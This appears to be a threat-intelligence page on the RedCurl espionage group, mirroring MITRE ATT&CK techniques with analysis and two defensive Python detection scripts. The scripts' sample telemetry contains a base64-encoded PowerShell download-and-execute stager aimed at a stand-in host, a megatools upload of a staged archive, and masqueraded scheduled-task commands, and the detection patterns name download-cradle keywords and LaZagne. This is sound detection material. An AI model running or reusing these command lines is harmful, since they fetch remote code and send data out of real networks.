G1039: RedCurl
RedCurl is a threat actor active since 2018 notable for corporate espionage targeting a variety of locations, including Ukraine, Canada and the United Kingdom, and a variety of industries, including but not limited to travel agencies, insurance companies, and banks.[1] RedCurl is allegedly a Russian-speaking threat actor.[1][2] The group’s operations typically start with spearphishing emails to gain initial access, then the group executes discovery and collection commands and scripts to find corporate data. The group concludes operations by exfiltrating files to the C2 servers.
Analyst context for executives and security teams
RedCurl matters because ATT&CK describes it as a corporate espionage group that starts with spearphishing, performs discovery and collection to locate business data, and exfiltrates files to command-and-control servers. For leaders, the practical issue is not just malware detection; it is whether the organization can prove it can detect data reconnaissance, credential access, shared-drive collection, email/local file harvesting, and outbound web-based exfiltration before sensitive corporate information leaves the environment.
Executive priority
Prioritize RedCurl as a test case for espionage-focused resilience: phishing-to-data-theft readiness, credential protection, shared-drive governance, email/data handling, and incident response evidence quality. Security leaders should ask whether SOC telemetry covers scripted discovery, LSASS access, scheduled task persistence, PowerShell/cmd/VB/Python execution, and abnormal outbound web traffic. Risk owners should also validate whether sensitive data on endpoints, network shares, and local email stores is classified, access-controlled, and monitored well enough to support audit and investigation decisions.
Technical view
ATT&CK provides no official detection text for RedCurl, so defenders should derive validation from the mapped techniques. Emphasis should be on Windows-heavy behaviors in the relationships, including LSASS memory access, scheduled tasks, PowerShell, Windows command shell, Visual Basic, local email collection, account discovery, file/directory discovery, and web-protocol C2. Also validate coverage for cross-platform or non-Windows relationship context where relevant, including Python execution, automated collection/exfiltration, network share access, web services for C2, obfuscated files, masqueraded resource names/locations, and file deletion. Build detections around behavior chains rather than single commands: phishing-led initial access followed by discovery, credential access, collection from local systems or shared drives, and outbound transfer to C2 infrastructure.
Likely telemetry
- Endpoint process creation and command-line logging for PowerShell, cmd, VB-related execution, Python, discovery commands, and file operations
- Windows security and EDR telemetry for LSASS access, suspicious credential material access, and privilege context
- Scheduled task creation, modification, and execution records
- File system telemetry for bulk discovery, staging, copying, deletion, obfuscated/archive-like files, and access to local email stores such as Outlook cache/storage files
- Network share access logs and file server audit logs for unusual enumeration or collection from shared drives
Detection direction
- Validate whether detections correlate multiple mapped behaviors: spearphishing entry, scripted execution, discovery, collection, credential access, persistence, and exfiltration.
- Tune PowerShell, cmd, VB, and Python detections to reduce noise from administration while highlighting unusual parent processes, rare users, unexpected hosts, encoded or obfuscated content, and activity outside normal maintenance windows.
- Monitor LSASS access carefully, separating legitimate security tooling from unusual process access or dump-like behavior.
- Baseline scheduled task activity and alert on new or modified tasks created by unexpected users, scripts, or locations.
- Look for abnormal enumeration of files, directories, local accounts, domain accounts, email accounts, services, and network shares, especially when followed by copying, archiving, deletion, or outbound web traffic.
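The detection direction above argues for chains of mapped behaviors rather than single-command alerts. The following is an added example, not code from ATT&CK, Group-IB, Trend Micro or any vendor: it scores constructed process-creation events per host, decodes PowerShell `-EncodedCommand` payloads, and flags a host only when several distinct mapped techniques appear inside one time window. The event fields, thresholds, host names and every command line are assumptions built for illustration; they mirror the tradecraft in the technique table (encoded PowerShell, Microsoft-looking task names pointing at user-writable paths, `pcalua.exe`, `rundll32.exe`, `netstat`, password-protected 7-Zip, `megatools`) but are not real RedCurl indicators.

```python
"""Behaviour-chain detection over constructed process-creation events.

Added example, not code from ATT&CK or any vendor. The event fields, the
thresholds and every sample command line below are assumptions built for
illustration; they mirror tradecraft in the technique table but are not
real RedCurl indicators.
"""
import base64
import re
from collections import defaultdict

USER_WRITABLE = re.compile(r"\\(users|temp|programdata|appdata)\\", re.I)
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def b64_utf16(script):
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(ev):
    """Map one event to the ATT&CK technique IDs its command line resembles."""
    img, cmd = ev["image"].lower(), ev["cmdline"]
    hits = set()
    if img == "powershell.exe":
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            hits.add("T1027")
            if re.search(r"downloadstring|invoke-webrequest|\biex\b", decoded, re.I):
                hits.add("T1059.001")
    if img == "cmd.exe" and re.search(r"\becho\b.*\|\s*cmd", cmd, re.I):
        hits.add("T1059.003")  # file name fed through echo rather than invoked directly
    if img == "schtasks.exe" and "/create" in cmd.lower():
        hits.add("T1053.005")
        tn = re.search(r'/tn\s+"?([^"\s]+)', cmd, re.I)
        tr = re.search(r'/tr\s+"?([^"]+)', cmd, re.I)
        if tn and tr and tn.group(1).lower().startswith("microsoft") and USER_WRITABLE.search(tr.group(1)):
            hits.add("T1036.005")  # Microsoft-looking task name, action in a user-writable path
    if img == "pcalua.exe" and re.search(r"\s-a\s", cmd):
        hits.add("T1202")
    if img == "rundll32.exe" and USER_WRITABLE.search(cmd):
        hits.add("T1218.011")
    if img == "netstat.exe":
        hits.add("T1046")
    if "megatools" in cmd.lower():
        hits.add("T1537")
    if re.search(r"\b7za?\.exe\b.*\s-p\S*", cmd, re.I):
        hits.add("T1560.001")  # password-protected 7-Zip archive
    if "lazagne" in cmd.lower():
        hits.add("T1555.003")
    return hits


def find_chains(events, window=600, min_techniques=3):
    """Per host, take the largest set of distinct techniques seen inside any
    `window`-second span and alert when it reaches `min_techniques`."""
    per_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        techs = classify(ev)
        if techs:
            per_host[ev["host"]].append((ev["ts"], techs))
    alerts = {}
    for host, hits in per_host.items():
        best = set()
        for i, (t0, _) in enumerate(hits):
            seen = set()
            for ts, techs in hits[i:]:
                if ts - t0 > window:
                    break
                seen |= techs
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_techniques:
            alerts[host] = sorted(best)
    return alerts


def _ev(ts, host, parent, image, cmdline):
    return {"ts": ts, "host": host, "parent": parent, "image": image, "cmdline": cmdline}


# Constructed sample telemetry: WS01 shows a phishing-to-exfiltration chain,
# WS02 shows ordinary administration that trips only isolated rules.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
SAMPLE_EVENTS = [
    _ev(100, "WS01", "outlook.exe", "cmd.exe", r"cmd.exe /c echo C:\Users\Public\update.bat | cmd"),
    _ev(160, "WS01", "cmd.exe", "powershell.exe", "powershell.exe -nop -w hidden -enc " + b64_utf16(STAGER)),
    _ev(200, "WS01", "cmd.exe", "rundll32.exe", r"rundll32.exe C:\Users\Public\lib.dll,Start"),
    _ev(240, "WS01", "cmd.exe", "schtasks.exe",
        r'schtasks /create /tn "MicrosoftCurrentupdatesCheck" /tr "C:\Users\Public\update.bat" /sc minute /mo 30'),
    _ev(300, "WS01", "cmd.exe", "pcalua.exe", r"pcalua.exe -a C:\Users\Public\7z.exe x -pSecret C:\Users\Public\tools.7z"),
    _ev(420, "WS01", "cmd.exe", "netstat.exe", "netstat -an"),
    _ev(500, "WS01", "cmd.exe", "megatools.exe", r"megatools.exe put -u user@example.invalid C:\Users\Public\out.7z"),
    _ev(110, "WS02", "explorer.exe", "powershell.exe", r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    _ev(150, "WS02", "cmd.exe", "schtasks.exe", r'schtasks /create /tn "NightlyBackup" /tr "C:\Program Files\Backup\run.exe" /sc daily'),
    _ev(400, "WS02", "cmd.exe", "netstat.exe", "netstat -an"),
]

if __name__ == "__main__":
    for host, techs in find_chains(SAMPLE_EVENTS).items():
        print(host, techs)
```

Run as written, it reports WS01 with ten mapped techniques and stays silent on WS02, whose scheduled-task creation and `netstat` call are each real but isolated. The threshold and window are the tuning knobs the bullets above describe: raising `min_techniques` trades missed short chains for fewer pages, and the `USER_WRITABLE` check is what separates a masqueraded `MicrosoftCurrentupdatesCheck` task from a genuine Microsoft task whose action lives under `Program Files` or `Windows`.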
Mitigation priorities
- Harden phishing resistance and user reporting processes, since the official description says operations typically begin with spearphishing emails.
- Reduce credential theft exposure by limiting administrative privileges, protecting LSASS, and monitoring privileged access paths.
- Apply least privilege and access review to network shares, local sensitive data stores, and email data; reduce broad access to corporate documents where possible.
- Constrain and monitor scripting interpreters and scheduled task creation according to business need.
- Improve data classification, retention, and logging for files likely to be valuable in corporate espionage scenarios.
Analyst notes and limits
The supplied ATT&CK description characterizes RedCurl as active since 2018, associated with corporate espionage against multiple locations and industries, and allegedly Russian-speaking. The relationship set is useful for building a defensive scenario: credential access, execution through scripting, discovery, collection from endpoints/shares/email, C2 over web protocols or web services, and automated exfiltration. Treat this as a behavior-driven coverage review rather than an attribution-driven hunting package.
Platforms and tactics are not specified on the group object itself, and ATT&CK provides no official detection text for this object. Platform references in this analysis come from related techniques, not from a group-level platform declaration. The supplied data does not support claims about current activity, confirmed attribution, customer exposure, specific infrastructure, malware, indicators, or guaranteed detection coverage. Local telemetry, asset scope, and business data locations are required to determine actual risk and control effectiveness.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1027 | Obfuscated Files or Information | RedCurl has used malware with string encryption.[therecord_redcurl] RedCurl has also encrypted data and has encoded PowerShell commands using Base64.[1][2] RedCurl has used `PyArmor` to obfuscate LaZagne.[1] Additionally, RedCurl has obfuscated downloaded files by renaming them as commonly used tools and has used `echo`, instead of the file names themselves, to execute files.[trendmicro_redcurl] |
| Enterprise | T1564.001 | Hidden Files and Directories | RedCurl added the "hidden" file attribute to original files to manipulate victims into clicking malicious LNK files.[1][2] |
| Enterprise | T1102 | Web Service | RedCurl has used web services to download malicious files.[1][2] |
| Enterprise | T1114.001 | Local Email Collection | RedCurl has collected emails to use in future phishing campaigns.[1] |
| Enterprise | T1039 | Data from Network Shared Drive | RedCurl has collected data about network drives.[1][2] |
| Enterprise | T1080 | Taint Shared Content | RedCurl has placed modified LNK files on network drives for lateral movement.[1][2] |
| Enterprise | T1204.002 | Malicious File | RedCurl has used malicious files to infect victim machines.[1][2][trendmicro_redcurl] |
| Enterprise | T1005 | Data from Local System | RedCurl has collected data from the local disk of compromised hosts.[1][2] |
| Enterprise | T1119 | Automated Collection | RedCurl has used batch scripts to collect data.[1][2] |
| Enterprise | T1083 | File and Directory Discovery | RedCurl has searched for and collected files on local and network drives.[therecord_redcurl][1][2] |
| Enterprise | T1059.003 | Windows Command Shell | RedCurl has used the Windows Command Prompt to execute commands.[1][2][trendmicro_redcurl] |
| Enterprise | T1059.001 | PowerShell | RedCurl has used PowerShell to execute commands and to download malware.[1][2][trendmicro_redcurl] |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location | RedCurl mimicked legitimate file names and scheduled tasks, e.g. `MicrosoftCurrentupdatesCheck` and `MdMMaintenenceTask`, to mask malicious files and scheduled tasks.[1][2] |
| Enterprise | T1566.001 | Spearphishing Attachment | RedCurl has used phishing emails with malicious files to gain initial access.[1][trendmicro_redcurl] |
| Enterprise | T1059.005 | Visual Basic | RedCurl has used VBScript to run malicious files.[1][2] |
| Enterprise | T1560.001 | Archive via Utility | RedCurl has downloaded 7-Zip to decompress password-protected archives.[trendmicro_redcurl] |
| Enterprise | T1573.001 | Symmetric Cryptography | RedCurl has used AES-128 CBC to encrypt C2 communications.[2] |
| Enterprise | T1071.001 | Web Protocols | RedCurl has used HTTP, HTTPS and WebDAV protocols for C2 communications.[1][2] |
| Enterprise | T1087.003 | Email Account | RedCurl has collected information about email accounts.[1][2] |
| Enterprise | T1587.001 | Malware | RedCurl has created its own tools to use during operations.[therecord_redcurl] |
| Enterprise | T1087.001 | Local Account | RedCurl has collected information about local accounts.[1][2] |
| Enterprise | T1056.002 | GUI Input Capture | RedCurl prompts the user for credentials through a Microsoft Outlook pop-up.[1][2] |
| Enterprise | T1082 | System Information Discovery | RedCurl has collected information about the target system, such as system information and the list of network connections.[1][2] |
| Enterprise | T1204.001 | Malicious Link | RedCurl has used malicious links to infect victim machines.[1][2] |
| Enterprise | T1573.002 | Asymmetric Cryptography | RedCurl has used HTTPS for C2 communication.[1][2] |
| Enterprise | T1053.005 | Scheduled Task | RedCurl has created scheduled tasks for persistence.[1][2][trendmicro_redcurl] |
| Enterprise | T1020 | Automated Exfiltration | RedCurl has used batch scripts to exfiltrate data.[1][2] |
| Enterprise | T1199 | Trusted Relationship | RedCurl has gained access to a contractor to pivot to the victim's infrastructure.[therecord_redcurl] |
| Enterprise | T1537 | Transfer Data to Cloud Account | RedCurl has used cloud storage to exfiltrate data; in particular, the megatools utilities were used to exfiltrate data to Mega, a file storage service.[1][2] |
| Enterprise | T1202 | Indirect Command Execution | RedCurl has used pcalua.exe to obfuscate binary execution and remote connections.[trendmicro_redcurl] |
| Enterprise | T1552.001 | Credentials In Files | |
| Enterprise | T1218.011 | Rundll32 | RedCurl has used rundll32.exe to execute malicious files.[1][2][trendmicro_redcurl] |
| Enterprise | T1087.002 | Domain Account | RedCurl has collected information about domain accounts using the Sysinternals AdExplorer tool.[1][2] |
| Enterprise | T1566.002 | Spearphishing Link | RedCurl has used phishing emails with malicious links to gain initial access.[1][2] |
| Enterprise | T1552.002 | Credentials in Registry | |
| Enterprise | T1070.004 | File Deletion | RedCurl has deleted files after execution.[1][2][trendmicro_redcurl] |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder | RedCurl has established persistence by creating entries in `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.[1][2] |
| Enterprise | T1555.003 | Credentials from Web Browsers | |
| Enterprise | T1059.006 | Python | RedCurl has used a Python script to establish outbound communication and to execute commands over SMB (TCP port 445).[trendmicro_redcurl] |
| Enterprise | T1003.001 | LSASS Memory | |
| Enterprise | T1046 | Network Service Discovery | RedCurl has used netstat to check whether port 4119 is open.[trendmicro_redcurl] |
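The T1083/T1039 rows (file search and collection across network drives) and the T1080 row (modified LNK files placed on network drives) both leave traces in file-server share-access auditing rather than in endpoint process logs. The following is an added example, not code from ATT&CK or any vendor, that runs over constructed audit records whose fields loosely follow Windows Security event 5145 (user, source address, share, relative path, access type). It raises one finding for a read burst that spans many folders in a short window and another for any shortcut written to the share, and shows why a service-account allowlist is needed before the burst rule is usable. All records, thresholds and account names are assumptions.

```python
"""Share enumeration burst and shortcut-drop detection over constructed
file-server audit events.

Added example, not code from ATT&CK or any vendor. The records loosely
follow the fields of Windows Security event 5145 (share object access).
Every record, threshold and account name below is constructed for
illustration.
"""
import ntpath
from collections import defaultdict


def detect_share_abuse(events, window=300, dir_threshold=8, file_threshold=30,
                       allowlist=frozenset()):
    """Return findings of two kinds:
    - enumeration_burst: one (user, source) reading at least `file_threshold`
      distinct files across at least `dir_threshold` folders within `window`
      seconds (T1083 / T1039 pattern), unless the account is on the allowlist;
    - lnk_write: any write of a .lnk file to the share (T1080 pattern)."""
    findings = []
    reads = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["access"] == "WriteData" and ev["path"].lower().endswith(".lnk"):
            findings.append({"type": "lnk_write", "user": ev["user"], "src": ev["src"],
                             "path": ntpath.join(ev["share"], ev["path"])})
        elif ev["access"] == "ReadData":
            reads[(ev["user"], ev["src"])].append(ev)
    for (user, src), evs in reads.items():
        if user in allowlist:
            continue  # backup and indexing accounts need a baseline, not this rule
        best = (0, 0)
        for i, first in enumerate(evs):
            dirs, files = set(), set()
            for ev in evs[i:]:
                if ev["ts"] - first["ts"] > window:
                    break
                files.add(ev["path"].lower())
                dirs.add(ntpath.dirname(ev["path"]).lower())
            best = max(best, (len(dirs), len(files)))
        if best[0] >= dir_threshold and best[1] >= file_threshold:
            findings.append({"type": "enumeration_burst", "user": user, "src": src,
                             "dirs": best[0], "files": best[1]})
    return findings


def make_events():
    """Constructed sample: a user sweeping ten folders and dropping a shortcut,
    a backup service reading far more, and a user opening two HR files."""
    share = r"\\FS01\Corp"
    events = []
    for d in range(10):
        for f in range(5):
            events.append({"ts": 1000 + d * 18 + f, "user": "j.doe", "src": "10.0.0.5", "share": share,
                           "path": rf"Dept{d:02d}\doc{f}.docx", "access": "ReadData"})
    events.append({"ts": 1210, "user": "j.doe", "src": "10.0.0.5", "share": share,
                   "path": r"Finance\Q3-report.lnk", "access": "WriteData"})
    for d in range(30):
        for f in range(10):
            events.append({"ts": 5000 + d * 5 + f // 2, "user": "svc_backup", "src": "10.0.0.9", "share": share,
                           "path": rf"Dept{d:02d}\file{f}.xlsx", "access": "ReadData"})
    events.append({"ts": 3000, "user": "m.lee", "src": "10.0.0.7", "share": share,
                   "path": r"HR\policy.pdf", "access": "ReadData"})
    events.append({"ts": 3040, "user": "m.lee", "src": "10.0.0.7", "share": share,
                   "path": r"HR\holidays.xlsx", "access": "ReadData"})
    return events


if __name__ == "__main__":
    for finding in detect_share_abuse(make_events(), allowlist={"svc_backup"}):
        print(finding)
```

With `svc_backup` allowlisted the output is two findings, both for `j.doe`: a burst of 50 files across 10 folders and the shortcut written into `Finance`. Without the allowlist the backup account produces a third finding, which is the false positive the "baseline first" advice in the detection direction is about. The shortcut rule is deliberately unconditional: ordinary users rarely create `.lnk` files on departmental shares, and a modified LNK on a share is exactly the T1080 lateral-movement mechanism the table attributes to this group.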
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 320d14f2b03d… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] group-ib_redcurl1: Group-IB. (2020, August). RedCurl: The Pentest You Didn't Know About. Retrieved August 9, 2024.
- [2] group-ib_redcurl2: Group-IB. (2021, November). RedCurl: The Awakening. Retrieved August 14, 2024.
- [3] mitre-attack: MITRE ATT&CK, G1039 RedCurl.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.